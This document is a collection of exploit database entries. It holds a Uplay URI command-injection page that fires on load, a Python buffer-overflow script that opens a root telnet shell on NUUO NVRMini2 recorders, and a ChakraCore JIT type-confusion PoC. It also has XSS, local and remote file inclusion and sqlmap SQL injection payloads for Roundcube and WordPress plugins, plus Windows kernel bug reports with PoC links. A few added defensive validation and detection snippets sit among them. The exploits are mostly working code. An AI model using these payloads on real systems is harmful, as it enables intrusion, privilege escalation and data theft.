
# Exploit Title: Ubisoft Uplay Desktop Client 63.0.5699.0 - Remote Code Execution
# Date: 2018-09-01
# Exploit Author: Che-Chun Kuo
# Vulnerability Type: URI Parsing Command Injection
# Vendor Homepage: https://www.ubisoft.com/en-us/
# Software Link: https://uplay.ubi.com/
# Version: 63.0.5699.0
# Tested on: Windows, Microsoft Edge
# Advisory: https://forums.ubi.com/showthread.php/1912340-Uplay-PC-Client-July-17th-2018
# CVE: N/A

# Vulnerability
# The Uplay desktop client does not properly validate user-controlled data passed to its custom 
# uplay URI protocol handler. This flaw can be used to exploit the Chromium Embedded Framework (CEF) 
# integrated within the Uplay client, allowing for arbitrary code execution.  

# Installing Uplay registers the following custom uplay protocol handler: 
# HKEY_CLASSES_ROOT
#	uplay
#		(Default) = "URL:uplay Protocol"
#		URL Protocol = ""
#			DefaultIcon
#				(Default) = "upc.exe"
#		Shell
#			Open
#			Command
#				(Default) = "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "%1"

# The %1 will be replaced with arguments from the URI. The following crafted URI performs arbitrary code execution: 

	'uplay://foobar" --GPU-launcher="cmd /K whoami &" --'

# When a victim opens this URI, the string is passed to the Windows ShellExecute function. 
# Microsoft states the following: "When ShellExecute executes the pluggable protocol handler with a 
# string on the command line, any non-encoded spaces, quotes, and backslashes in the URI will 
# be interpreted as part of the command line. This means that if you use C/C++’s argc and 
# argv to determine the arguments passed to your application, the string may be broken 
# across multiple parameters."
	
# "Malicious parties could use additional quote or backslash characters to pass additional command 
# line parameters. For this reason, pluggable protocol handlers should assume that any parameters on 
# the command line could come from malicious parties, and carefully validate them."

# The Uplay desktop client does not properly validate user-controlled data. An attacker can inject 
# certain Chromium flags that allow for arbitrary code execution. The malicious URI breaks the 
# command line with a quote character and inserts a new switch called --GPU-launcher. Since the 
# Uplay client uses the Chromium Embedded Framework (CEF), Chromium command-line switches are supported.
# The --GPU-launcher switch provides a method to execute arbitrary commands. The following string shows 
# the final command, which opens the Windows command prompt and executes the whoami program. 
	
	"C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "foobar" --GPU-launcher="cmd /K whoami &" --"
	
# Attack Scenario
# The following attack scenario would result in the compromise of a victim's machine with the vulnerable 
# Uplay client installed. A user running Microsoft Edge visits a specially crafted webpage or clicks on a 
# specially crafted link. The user is served with the prompt: Did you mean to switch apps? Microsoft Edge 
# is trying to open "UPlay launcher". After the user gives consent, the vulnerable application runs, 
# resulting in arbitrary code execution in the context of the current process.

# This scenario also works on IE, but the IE browser shows the URI string to be opened and warns users against 
# opening untrusted content. Microsoft Edge provides no such warning. Chrome and Firefox both escape 
# illegal characters before passing the URI to the protocol handler.
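As an added illustration (not code from the advisory or from Ubisoft), the Python below models the command-line split a Windows protocol handler sees for the URI above and the argv validation such a handler should perform; the percent-encoded variant shows why a browser that escapes the URI leaves it as a single argument. The "%1" template is the registry command quoted above; the validator and samples are constructed.

```python
import re
from typing import List
from urllib.parse import quote

# Handler command registered by the Uplay installer, from the advisory.
UPC_EXE = r"C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe"
# Crafted URI from the advisory.
MALICIOUS_URI = 'uplay://foobar" --GPU-launcher="cmd /K whoami &" --'
# What a browser that escapes illegal characters (Chrome, Firefox) would hand over.
ENCODED_URI = quote(MALICIOUS_URI, safe=':/')


def build_cmdline(uri: str) -> str:
    """Substitute %1 the way ShellExecute does: raw text, no escaping."""
    return f'"{UPC_EXE}" "{uri}"'


def win_argv(cmdline: str) -> List[str]:
    """Split a command line with the core CommandLineToArgvW rules: unquoted
    whitespace separates arguments, a double quote toggles quoting, 2n
    backslashes before a quote become n backslashes, 2n+1 become n backslashes
    plus a literal quote, and backslashes anywhere else are literal."""
    argv, cur, in_quotes, have_arg = [], [], False, False
    i, n = 0, len(cmdline)
    while i < n:
        c = cmdline[i]
        if c == '\\':
            j = i
            while j < n and cmdline[j] == '\\':
                j += 1
            nbs = j - i
            if j < n and cmdline[j] == '"':
                cur.append('\\' * (nbs // 2))
                if nbs % 2:           # odd run: the quote is a literal character
                    cur.append('"')
                    j += 1
            else:
                cur.append('\\' * nbs)
            i, have_arg = j, True
        elif c == '"':
            in_quotes, have_arg = not in_quotes, True
            i += 1
        elif c in ' \t' and not in_quotes:
            if have_arg:
                argv.append(''.join(cur))
                cur, have_arg = [], False
            i += 1
        else:
            cur.append(c)
            have_arg = True
            i += 1
    if have_arg:
        argv.append(''.join(cur))
    return argv


# Constructed allow-list: a percent-encoded uplay:// URI may contain only
# RFC 3986 characters, so no space, double quote or backslash can be present.
SAFE_ARG = re.compile(r"^uplay://[A-Za-z0-9._~%!$&'()*+,;=:@/?#-]*$")


def handler_accepts(cmdline: str) -> bool:
    """Validation a pluggable protocol handler should apply to its own argv:
    exactly one argument after the program name, and that argument must match
    the allow-list, so a URI that spilled into extra switches is rejected."""
    argv = win_argv(cmdline)
    return len(argv) == 2 and SAFE_ARG.match(argv[1]) is not None


if __name__ == "__main__":
    for uri in (MALICIOUS_URI, ENCODED_URI, 'uplay://launch/12345'):
        cmd = build_cmdline(uri)
        print(win_argv(cmd), '->', 'accepted' if handler_accepts(cmd) else 'rejected')
```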

# After the Uplay desktop client (upc.exe) is run, upc.exe will attempt to open additional executables 
# before the --GPU-launcher is activated. One notable executable is UplayService.exe. UplayService 
# requires elevated privileges. If the user is a non-administrative user, a UAC prompt will appear. 
# It should be noted that this UAC prompt doesn't prevent command execution from occurring. 
# Regardless of which option the user chooses within the UplayService UAC prompt (Yes/No), 
# command execution will still occur once the code that passes the --GPU-launcher switch 
# to the CEF is triggered within upc.exe. 

# Proof of Concept
# The following POC provides two avenues to trigger the vulnerability within Microsoft Edge. 
# The first method triggers when the webpage is opened. The second method triggers when the 
# hyperlink is clicked by a user.

<!doctype html>
<a href='uplay://foobar" --GPU-launcher="cmd /K whoami &" --'>ubisoft uplay desktop client rce poc</a>

<script>
  window.location = 'uplay://foobar" --GPU-launcher="cmd /K whoami &" --'
</script>
            
# Exploit Title: NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)
# Date: 2018-09-17
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.nuuo.com/
# Device: NVRMini2
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Versions: 3.8.0 and below
# Tested Against: 03.07.0000.0011 and 03.08.0000.0005
# Tested on: Ubuntu and OSX
# CVE: N/A
# TRA: https://www.tenable.com/security/research/tra-2018-25
# Description:

# A stack buffer overflow exists in the cgi_system binary. The error occurs
# due to lack of bounds checking on the PHPSESSID value before and when
# it is passed to sprintf in order to generate the session id file name.
# As written, this exploit enables Telnet.

# Executes a command via the stack buffer overflow in cookie parsing. The command
# is executed via 'system' as root. The overflow logic is like so:
#
# address 1: 405e2e34 - load system into r3 and address 2 into lr
#
# .text:000D0E34 0F 48 BD E8                 LDMFD   SP!, {R0-R3,R11,LR}
# .text:000D0E38 1E FF 2F E1                 BX      LR
#
# address 2: 406037cc - load the system command into r0. Jump to system.
#
# .text:000F17CC 0D 00 A0 E1                 MOV     R0, SP
# .text:000F17D0 33 FF 2F E1                 BLX     R3
#
# [   address 1  ][       r0     ][      r1      ][      r2      ][  r3 system   ][      r11     ][  LR - addr2  ][ system command ]
# \x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40touch /tmp/lolwat

# PoC

import requests
import socket
import sys

def stack_buffer_overflow(command, ip, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print '[+] Executing %s on %s:%s...' % (command, ip, port)
    sock.connect((ip, int(port)))
    exec_request = ('GET /cgi-bin/cgi_system?cmd=portCheck HTTP/1.1\r\n' +
                    'Host: ' + ip + ':' + port + '\r\n' +
                    'Accept: */*\r\n' +
                    'Cookie: PHPSESSID=982e6c010064b3878a4b793bfab8d2d2' +
                    'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAABBBBCCCCDD' +
                    '\x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40' + command +
                    '\r\n\r\n')
    sock.sendall(exec_request)
    data = sock.recv(1024)
    sock.close()

    # We should get a 500 Internal error in response
    return data.find('500') != -1

# Quickly tries to grab the version of the target. If the target is
# using anything other than 3.7 or 3.8 then we'll bail out, since we
# haven't tested on any other targets.

def check_target(ip, port):
    index = requests.get('http://' + ip + ':' + port + "/upgrade_handle.php?cmd=getcurrentinfo")
    return (index.text.find('<Titan>03.08') != -1 or index.text.find('<Titan>03.07') != -1)

if __name__ == "__main__":

    if (len(sys.argv) != 3):
        print "Usage: python nvrmini2_enable_telnet.py <ipv4 address> <port>"
        sys.exit(1)

    ip = sys.argv[1]
    port = sys.argv[2]

    if int(port) > 65535:
        print('[-] Invalid port parameter')
        sys.exit(0)

    if len(ip.split('.')) != 4:
        print('[-] Invalid IP address parameter')
        sys.exit(0)

    print '[+] Checking for a valid target...'
    if (check_target(ip, port) == False):
        print('[-] The target is not a NVRMini2 or its using an untested version.')
        sys.exit(0)
    print '[+] Valid target!'

    if (stack_buffer_overflow('mount -t devpts devpts /dev/pts', ip, port) == False):
        print('[-] Mount failed')
        sys.exit(0)

    if (stack_buffer_overflow('/bin/sh -c "/usr/sbin/telnetd -l /bin/bash -b 0.0.0.0"&', ip, port) == False):
        print('[-] telnetd bind failed')
        sys.exit(0)

    print('[+] Success!')
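As an added example (not part of the exploit above), the following Python flags requests that carry a PHPSESSID shaped like the overflow described earlier: anything other than a plain session id sent to /cgi-bin/cgi_system. The sample requests are constructed; the assumption that a legitimate session id is 32 hexadecimal characters is taken from the PoC's own cookie value.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# Assumed legitimate session id format, taken from the PoC's own cookie value.
SESSID_OK = re.compile(r'^[0-9a-f]{32}$')
VULNERABLE_PATH = '/cgi-bin/cgi_system'


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Minimal HTTP/1.x request parser: request line plus headers.
    Raw bytes from a capture should be decoded as latin-1 first so that the
    non-ASCII bytes of an overflow payload survive intact."""
    head = raw.split('\r\n\r\n', 1)[0]
    lines = head.split('\r\n')
    method, target, _version = lines[0].split(' ', 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ':' in line:
            name, value = line.split(':', 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def phpsessid_from_cookie(cookie: str) -> Optional[str]:
    """Return the PHPSESSID value from a Cookie header, or None if absent."""
    for part in cookie.split(';'):
        name, _, value = part.strip().partition('=')
        if name == 'PHPSESSID':
            return value
    return None


def classify(raw: str) -> Optional[str]:
    """Return a finding for a request that looks like the cgi_system cookie
    overflow, or None for traffic that does not match."""
    _method, target, headers = parse_request(raw)
    if urlsplit(target).path != VULNERABLE_PATH:
        return None
    sessid = phpsessid_from_cookie(headers.get('cookie', ''))
    if sessid is None or SESSID_OK.match(sessid):
        return None
    if any(not 0x20 <= ord(ch) <= 0x7e for ch in sessid):
        return 'non-printable bytes in PHPSESSID'
    if len(sessid) > 32:
        return f'oversized PHPSESSID ({len(sessid)} bytes)'
    return 'malformed PHPSESSID'


def scan(requests: List[str]) -> List[Tuple[int, str]]:
    """Run classify() over a batch and keep only the hits."""
    hits = []
    for idx, raw in enumerate(requests):
        finding = classify(raw)
        if finding:
            hits.append((idx, finding))
    return hits


# Constructed sample requests (192.0.2.10 is a documentation address).
_HOST = 'Host: 192.0.2.10\r\n'
_VALID_ID = '982e6c010064b3878a4b793bfab8d2d2'
SAMPLES = [
    # 0: ordinary request with a normal session id
    'GET /cgi-bin/cgi_system?cmd=portCheck HTTP/1.1\r\n' + _HOST +
    'Cookie: PHPSESSID=' + _VALID_ID + '\r\n\r\n',
    # 1: overflow-shaped cookie, a valid id followed by 140 bytes of filler
    'GET /cgi-bin/cgi_system?cmd=portCheck HTTP/1.1\r\n' + _HOST +
    'Cookie: PHPSESSID=' + _VALID_ID + 'a' * 140 + '\r\n\r\n',
    # 2: long cookie to an unrelated endpoint, not this bug
    'GET /upgrade_handle.php?cmd=getcurrentinfo HTTP/1.1\r\n' + _HOST +
    'Cookie: PHPSESSID=' + 'a' * 200 + '\r\n\r\n',
    # 3: short cookie carrying raw address-like bytes
    'GET /cgi-bin/cgi_system?cmd=portCheck HTTP/1.1\r\n' + _HOST +
    'Cookie: PHPSESSID=\x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\r\n\r\n',
]

if __name__ == '__main__':
    for idx, finding in scan(SAMPLES):
        print(f'sample {idx}: {finding}')
```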
            
/*
A call to the String.prototype.localeCompare method can be inlined when it only takes one argument. There are two versions of String.prototype.localeCompare, one [1] is written in JavaScript and the other [2] is written in C++ which just calls the JavaScript version when Intl is enabled without updating ImplicitCallFlags. Since JavaScript code could be executed without touching ImplicitCallFlags, this could be exploited in a similar way to that I used for issue 1565.

The only usable code I could find in the JavaScript localeCompare was:
            const thatStr = String(that);

I could override the toString method of "that" which is the first parameter to execute arbitrary JavaScript code. But there was a problem that the toString method was also called in the C++ localeCompare prior to executing the JavaScript localeCompare which updated ImplicitCallFlags. Actually calling a JavaScript function can clear the flag during the initialization process [3] if profiling is enabled, but it was not for Intl.js. So I needed to find another way to exploit this.

Here's the JavaScript localeCompare.

let localeCompareStateCache;
platform.registerBuiltInFunction(tagPublicFunction("String.prototype.localeCompare", function (that, locales = undefined, options = undefined) {
    if (this === undefined || this === null) {
        platform.raiseThis_NullOrUndefined("String.prototype.localeCompare");
    }

    const thisStr = String(this);
    const thatStr = String(that);

    // Performance optimization to cache the state object and UCollator when the default arguments are provided
    // TODO(jahorto): investigate caching when locales and/or options are provided
    let stateObject;
    if (locales === undefined && options === undefined) {
        if (localeCompareStateCache === undefined) {
            localeCompareStateCache = _.create();
            InitializeCollator(localeCompareStateCache, undefined, undefined);
        }

        stateObject = localeCompareStateCache;
    } else {
        stateObject = _.create();
        InitializeCollator(stateObject, locales, options);
    }

    return platform.localeCompare(thisStr, thatStr, stateObject, /* forStringPrototypeLocaleCompare */ true);
}), IntlBuiltInFunctionID.StringLocaleCompare);

My idea was to optimize the method partially, so that when it hits an unprofiled instruction, the flag gets cleared during the bailout process [4].

[1] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/InJavascript/Intl.js#L984
[2] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/JavascriptString.cpp#L1297
[3] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Language/InterpreterStackFrame.cpp#L1831
[4] https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Backend/BailOut.cpp#L1492


PoC:
*/

function opt(arr, s) {
    arr[0] = 1.1;

    if (s !== null) {
        let tmp = 'a'.localeCompare(s);
    }

    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1];

    for (let i = 0; i < 100; i++) {
        'a'.localeCompare('x', []);  // Optimize the JavaScript localeCompare

        opt(arr, null);  // for profiling all instructions in opt.

        try {
            opt(arr, {toString: () => {
                throw 1;  // Don't profile "if (locales === undefined && options === undefined) {"
            }});
        } catch (e) {

        }
    }

    opt(arr, {toString: () => {
        // Called twice
        arr[0] = {};
    }});

    print(arr);
}

main();
            
# Exploit Title: Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting
# Date: 2018-09-09
# Exploit Author: Fahimeh Rezaei
# Vendor Homepage: https://plugins.roundcube.net/packages/eagle00789/rcfilters
# Software Link: https://plugins.roundcube.net/packages/eagle00789/rcfilters
# Version: rcfilters plugin v2.1.6
# Tested on: Roundcube version 1.0.5
# CVE : CVE-2018-16736
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16736
# https://nvd.nist.gov/vuln/detail/CVE-2018-16736
# https://github.com/eagle00789/RC_Filters/issues/19

# Details:
# In the rcfilters plugin 2.1.6 for Roundcube, XSS exists via the 
# _whatfilter and _messages parameters (in the Filters section of the settings).

# PoC

POST /rc/?_task=settings&_action=plugin.filters-save HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Referer: https://Target/rc/?_action=plugin.filters&_task=settings
Cookie: roundcube_sessid=; roundcube_sessauth=
Connection: close
Upgrade-Insecure-Requests: 1

_token=09bcde247d252364ea55c217c7654a1f&_whatfilter=from]<script>alert('XSS-1')</script>&_searchstring=whatever&_casesensitive=1&_folders=INBOX&_messages=all])<script>alert('XSS-2')</script>
            
# Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/wechat-broadcast/
# CVE: CVE-2018-16283

# Description
# This bug was found in the file: /wechat-broadcast/wechat/Image.php
# echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');
# The parameter "url" is not sanitized, allowing inclusion of local or remote files.
# To exploit the vulnerability it is only necessary to use version 1.0 of the HTTP protocol 
# to interact with the application.

# PoC
# The following URL has been confirmed to be vulnerable to local and remote file inclusion.

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd

# Remote File Inclusion POC:

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt
            
Windows: Double Dereference in NtEnumerateKey Elevation of Privilege
Platform: Windows 10 1803 (not vulnerable in earlier versions)
Class: Elevation of Privilege

Summary: A number of registry system calls do not correctly handle pre-defined keys resulting in a double dereference which can lead to EoP.

Description:

The registry contains a couple of predefined keys used to generate performance information. These actually exist in the machine hive under \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib. When these keys are opened the kernel returns a status code of STATUS_PREDEFINED_KEY, but it also returns a handle to the key. 

The kernel doesn’t allow these keys to be used for many operations such as enumeration of subkeys and values, so these system calls check before the key is used and return STATUS_INVALID_HANDLE. The code for this in NtEnumerateKey looks like the following:

status = ObReferenceObjectByHandle(Handle, KEY_ENUMERATE, CmKeyObjectType, &Object);
if (status >= 0 && Object->Type != 'ky02') {
    status = STATUS_INVALID_HANDLE;
    ObfDereferenceObject(Object); // <-- dereferences the object
}
if (status < 0) {
    goto EXIT_LABEL;
}

This code in itself is fine, but in 1803 at the exit label we find the following additional code:

if (Object)
    ObfDereferenceObject(Object);

This results in the object being dereferenced twice. Due to the way the object reference counting works this will not be noticed until the key handle is closed, which results in a REFERENCE_BY_POINTER bugcheck being generated. This might only be a local DoS if the issue was caught earlier, but because the caller can do other things with the corrupted object we can potentially turn this into a UaF and from there elevate privileges. For example the provided PoC passes the handle to NtDuplicateObject which results in the kernel modifying a free pool allocation.

I’d recommend ensuring you check all similar functions such as NtEnumerateValueKey as there seems to be a common issue, perhaps it’s a macro or template which is generating the bad code.

The following is an example dump from a crash, at the end the !pool command is used on the object address to demonstrate the memory allocation was freed before being modified.

Use !analyze -v to get detailed debugging information.

BugCheck 18, {0, ffff8e0db3a0f7a0, 2, ffffffffffffffff}

Probably caused by : ntkrnlmp.exe ( nt!ObfDereferenceObjectWithTag+155dd9 )

Followup:     MachineOwner
---------

0: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

REFERENCE_BY_POINTER (18)
Arguments:
Arg1: 0000000000000000, Object type of the object whose reference count is being lowered
Arg2: ffff8e0db3a0f7a0, Object whose reference count is being lowered
Arg3: 0000000000000002, Reserved
Arg4: ffffffffffffffff, Reserved
	The reference count of an object is illegal for the current state of the object.
	Each time a driver uses a pointer to an object the driver calls a kernel routine
	to increment the reference count of the object. When the driver is done with the
	pointer the driver calls another kernel routine to decrement the reference count.
	Drivers must match calls to the increment and decrement routines. This bugcheck
	can occur because an object's reference count goes to zero while there are still
	open handles to the object, in which case the fourth parameter indicates the number
	of opened handles. It may also occur when the objects reference count drops below zero
	whether or not there are open handles to the object, and in that case the fourth parameter
	contains the actual value of the pointer references count.

STACK_TEXT:  
ffffb78e`5a91f678 fffff803`57473ab9 : 00000000`00000018 00000000`00000000 ffff8e0d`b3a0f7a0 00000000`00000002 : nt!KeBugCheckEx
ffffb78e`5a91f680 fffff803`57751b9b : 00000000`00000000 00000000`00000000 00020019`00000000 ffffb78e`5a91f7c0 : nt!ObfDereferenceObjectWithTag+0x155dd9
ffffb78e`5a91f6c0 fffff803`5775157d : ffffe58b`763cf580 00000a50`00000040 ffffe58b`75c75f20 00000000`00000001 : nt!ObDuplicateObject+0x58b
ffffb78e`5a91f980 fffff803`5743c943 : ffffe58b`763c4700 00000000`008fe098 ffffb78e`5a91fa28 00000000`00000000 : nt!NtDuplicateObject+0x12d
ffffb78e`5a91fa10 00007ffa`f3cda634 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13
00000000`008fe078 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007ffa`f3cda634


0: kd> !pool ffff8e0db3a0f7a0
Pool page ffff8e0db3a0f7a0 region is Paged pool
 ffff8e0db3a0f000 size:  150 previous size:    0  (Free )  FMfn
 ffff8e0db3a0f150 size:  130 previous size:  150  (Free)       Free
 ffff8e0db3a0f280 size:   40 previous size:  130  (Allocated)  MPan
 ffff8e0db3a0f2c0 size:   50 previous size:   40  (Free )  SeAt
 ffff8e0db3a0f310 size:   c0 previous size:   50  (Free )  Se  
 ffff8e0db3a0f3d0 size:   50 previous size:   c0  (Free)       Free
 ffff8e0db3a0f420 size:  220 previous size:   50  (Allocated)  FMfn
 ffff8e0db3a0f640 size:   a0 previous size:  220  (Allocated)  Sect
 ffff8e0db3a0f6e0 size:   50 previous size:   a0  (Free)       Free
*ffff8e0db3a0f730 size:  100 previous size:   50  (Free ) *Key 
		Pooltag Key  : Key objects
 ffff8e0db3a0f830 size:   10 previous size:  100  (Free)       Free
 ffff8e0db3a0f840 size:   e0 previous size:   10  (Allocated)  NtFs
 ffff8e0db3a0f920 size:   c0 previous size:   e0  (Allocated)  FIcs
 ffff8e0db3a0f9e0 size:   c0 previous size:   c0  (Free )  SeTd
 ffff8e0db3a0faa0 size:  560 previous size:   c0  (Allocated)  Ntff




Proof of Concept:

I’ve provided a PoC as a C# project. This only demonstrates the issue and proves that it would be possible to force this issue into a UaF even with the mitigations on reference counting.

1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
2) Run the PoC on a machine with Windows 10 1803, I’ve only tested x64.
3) The OS should crash, inspect it in a kernel debugger or from the crash dump.

Expected Result:
The OS ignores the pre-defined key as expected.

Observed Result:
The object’s reference count is corrupted.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45436.zip
            
Windows: CiSetFileCache TOCTOU CVE-2017-11830 Variant WDAC Security Feature Bypass
Platform: Windows 10 1803, 1709 (should include S-Mode but not tested)
Class: Security Feature Bypass

Summary:
While the TOCTOU attack against cache signing has been mitigated through NtSetCachedSigningLevel it’s possible to reach the same code via NtCreateSection leading to circumventing WDAC policies and CIG/PPL. 

Description:
I'm reporting this as you've fixed the previous issues (cases 43036 and 40101) so I'm making an assumption you'd also fix this one. The previous issues allowed an unprivileged caller to exploit a race condition in the CiSetFileCache kernel function by calling NtSetCachedSigningLevel. These issues should now be fixed. During my research into PPL/PP bypasses I noticed that the cache will also be written during the initial creation of an image section, when the process is running with an increased section signing level. This is presumably to allow the kernel to cache the signature automatically. This is an issue because it’s possible to create an image section with a writable (and executable) handle to the file and no part of CI then checks whether the caller has write access. It’s possible to have an elevated section signing level by enabling the ProcessSignaturePolicy process mitigation policy; it’s not required to be in a PPL. In fact, while I’ve not tested it, it’s possible that just running inside a process on Windows 10 S-Mode would be sufficient as the section signing level should be elevated for WDAC. 

So to exploit this we can do the following:

1. Elevate the section signing level of the current process using SetProcessMitigationPolicy or just run in a WDAC/CIG process.
2. Copy a valid signed file to a known name then open a writable and executable handle to that file.
3. Set an oplock on a known catalog file which will be checked.
4. Call NtCreateSection with the handle requesting SEC_IMAGE.
5. Wait for oplock to fire, rewrite the file with an untrusted binary, then release oplock.
6. Close section and file handles. The cache should have been applied to the untrusted file.

Perhaps CI should check whether the file handle has been opened for write access and not write out the cache in those cases as realistically creating an image section from a writable handle should be an unusual operation. The normal loader process opens the handle only for read/execute.

Proof of Concept:

I’ve provided a PoC as a C# project. It will allow you to “cache sign” an arbitrary executable. To test on S-Mode you’ll need to sign the PoC (and the NtApiDotNet.dll assembly) so it’ll run. It copies notepad to a file, attempts to verify it but uses an oplock to rewrite the contents of the file with the untrusted file before it can set the kernel EA.

1) Compile the C# project. It will need to grab the NtApiDotNet v1.1.15 package from NuGet to work.
2) Execute the PoC passing the path to an unsigned file and to the output  “cache signed” file, e.g. poc unsigned.exe output.exe. Make sure the output file is on a volume which supports cached signing level such as the main boot volume.
3) You should see it print the signing level, if successful.
4) You should now be able to execute the unsigned file, bypassing the security policy enforcement.

NOTE: If it prints an exception then the exploit failed. The opened catalog files seemed to be cached for some unknown period of time after use, so if the catalog file I’m using for a timing signal is already open then the oplock is never broken. Just rerun the PoC, which will pick a different catalog file to use. Also the output file must be on an NTFS volume with the USN Change Journal enabled as that’s relied upon by the signature level cache code. Best to do it to the boot drive as that ensures everything should work correctly.

Expected Result:
Access denied or at least an error setting the cached signing level.

Observed Result:
The signing level cache is applied to the file with no further verification. You can now execute the file as if it was signed.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45435.zip
            
Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2018-08-22
CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-1002004][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009]
Download Site: https://wordpress.org/plugins/bft-autoresponder/
Vendor: Kiboko Labs https://calendarscripts.info/
Vendor Notified: 2018-08-22, Fixed v2.5.1.5
Vendor Contact: @prasunsen wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=203
Description: This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule an unlimited number of email messages. Messages can be sent on a defined number of days after user registration, or on a fixed date.
Vulnerability:
These vulnerabilities require administrative privileges to exploit.

CVE-2018-1002000

There is an exploitable blind SQL injection vulnerability via the del_ids parameter in a POST request. 

In line 69 of file controllers/list.php:

65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")");

del_ids is not sanitized properly.

Nine reflected XSS vulnerabilities:

CVE-2018-1002001

In line 22-23 of controllers/list.php:

22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob'];
23 echo "<meta http-equiv='refresh' content='0;url=$url' />";

CVE-2018-1002002

bft_list.html.php:28: 
<div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div>

CVE-2018-1002003

bft_list.html.php:29: 
<div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div>

CVE-2018-1002004

bft_list.html.php:42: 
<input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo empty($_GET['sdate']) ? '' : $_GET['sdate']?>">

CVE-2018-1002005

bft_list.html.php:43: 
<input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div>

CVE-2018-1002006

integration-contact-form.html.php:14: 
<p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p>

CVE-2018-1002007

integration-contact-form.html.php:15: 
<p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p>

CVE-2018-1002008

list-user.html.php:4: 
<p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p>

CVE-2018-1002009

unsubscribe.html.php:3: 
<p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p>

Exploit Code:
SQL Injection CVE-2018-1002000
$ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql

Where post_data is:

POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1
Host: example.com
Connection: keep-alive
Content-Length: 150
Cache-Control: max-age=0
Origin: http://example.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
